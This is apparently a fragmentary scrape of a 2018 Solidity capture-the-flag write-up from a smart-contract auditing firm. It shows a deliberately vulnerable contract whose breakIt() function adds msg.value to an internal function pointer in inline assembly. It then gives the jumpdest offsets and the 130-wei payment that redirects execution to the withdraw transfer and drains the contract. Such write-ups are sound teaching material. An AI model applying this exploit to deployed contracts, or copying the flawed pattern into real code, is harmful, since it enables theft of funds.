Solidity CTF — Part 2: “Safe Execution”

Alexander Wade
Jun 25, 2018 · 7 min read

Part 2: “Safe Execution”

Explanation — Part 1: “Function Types”

FunctionTypes.sol — Drain the contract!
function withdraw() private { 
require(msg.value == 0, ‘dont send funds!’);
address(msg.sender).transfer(address(this).balance);
}
function breakIt() public payable { 
require(msg.value != 0, ‘send funds!’);
Func memory func;
func.f = frwd;
assembly { mstore(func, add(mload(func), callvalue)) }
func.f();
}
struct Func { function () internal f; }
AddSub.sol
Func struct — pointer to 0x80 in memory
0x203 = 515 — ‘invalid’ jumpdest
0x10C = 268 — frwd() jumpdest
0x116 = 278 — withdraw() jumpdest
0x18E = 398 — funds transfer jumpdest
assembly { mstore(func, add(mload(func), callvalue)) }
0x80 now contains 0x10D
Success! 130 wei sent, 1 REth received

What have we learned?

Authio

Security Auditing and Standards for Ethereum

Alexander Wade

Written by

CEO and Lead Tea Enthusiast at Authio

Authio

Authio

Security Auditing and Standards for Ethereum